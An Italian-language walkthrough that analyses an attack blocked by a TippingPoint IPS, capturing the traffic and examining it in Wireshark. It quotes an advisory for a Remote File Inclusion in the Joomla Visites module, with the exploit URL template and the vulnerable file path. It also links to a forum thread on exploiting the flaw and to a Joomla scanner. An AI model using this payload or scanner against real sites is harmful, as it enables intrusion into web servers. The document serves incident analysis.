ANALISI DI UN ATTACCO CON TIPPINGPOINT TRAMITE TRACE

Con attivato il “default security profile” sul segmento di traffico su cui transita il
traffico diretto a dei server web aziendali, possiamo trovare sotto la voce ”Block Log”
le notifiche di traffico bloccato.

Nel caso specifico l’attacco segnalato riguarda un attacco sfruttando una vulnerabilità
di una applicazione scritta in php. Si possono avere maggiori dettagli cliccando sul link
contenente il nome della vulnerabilità.
Per analizzare in dettaglio le caratteristiche dell’attacco si può cambiare l’azione
predefinita assegnata alla signature comparsa nei log, cambiando da “block+notify” a
“block+notify+trace” l’azione assegnata in modo da avere una copia dei pacchetti
passati che contengono l’attacco appena bloccato. Così facendo non solo verrà
bloccato e loggato l’attacco ma avremmo anche modo di analizzarlo a posteriori con
un tool di analisi del traffico come Wireshark.

In seguito all’attivazione di questa nuova azione nei log troveremo anche un’immagine
con un floppy che ci indicherà che di quel pacchetto possiamo anche scaricare la trace
(ossia lo stream di pacchetti contenenti l’attacco) per ulteriori analisi.
Cliccando sull’icona di salvataggioe salvando il file per l’analisi sul proprio pc

Aprendo il pacchetto con Wireshark possiamo analizzare il traffico incriminato. In

particolare in questo caso si tratta di una vulnerabilità sul php. Il server target ospita
un’applicazione web Joomla.
Analizzando in dettaglio si osserva che nella GET http vengono incluse delle url con
riferimento a file appositamente creati e posti su server web pubblici compromessi . In
particolare questa GET cerca di sfruttare una particolare vulnerabilità nota di Joomla in
cui il modulo “Visites” può essere sfruttato per una Remote File Inclusion se riceve in
input dei particolari files.

Questi i dettagli della vulnerabilità:

Joomla Visites 1.1 RC2 - RFI
[o] Joomla Visites 1.1 RC2 Remote File Inclusion Vulnerability
Software : com_joomla-visites version 1.1 RC2
Vendor : http://www.joomla-visites.net/
Author : NoGe

[o] Vulnerable file

administrator/components/com_joomla-visites/core/include/myMailer.class.php
require_once $mosConfig_absolute_path . '/includes/phpmailer/class.phpmailer.php';

[o] Exploit
http://localhost/[path]/administrator/components/com_joomla-
visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]

[o] Publish
http://milw0rm.com/exploits/5497

Maggiori dettagli sulle modalità d’utilizzo di questa particolare vulnerabilità:

http://blacklight.gotdns.org/forum/viewtopic.php?t=3008&sid=ed6171e9b7e433ffcd96
46175dfda4b9

tool di scansione per rilevare possibili url vulnerabili su Joomla disponbile qui:

http://www.darkc0de.com/scanners/joomlascan.py
Come ultima nota si può scaricare il file, una finta gif, che veniva passato in input alla
nostra applicazione web vulnerabile e aprendolo con un editor esadecimale si può
osservare del codice php contenuto in esso:

Questo codice se eseguito su un sistema vulnerabile mostra un bel po’ di informazioni

di sistema.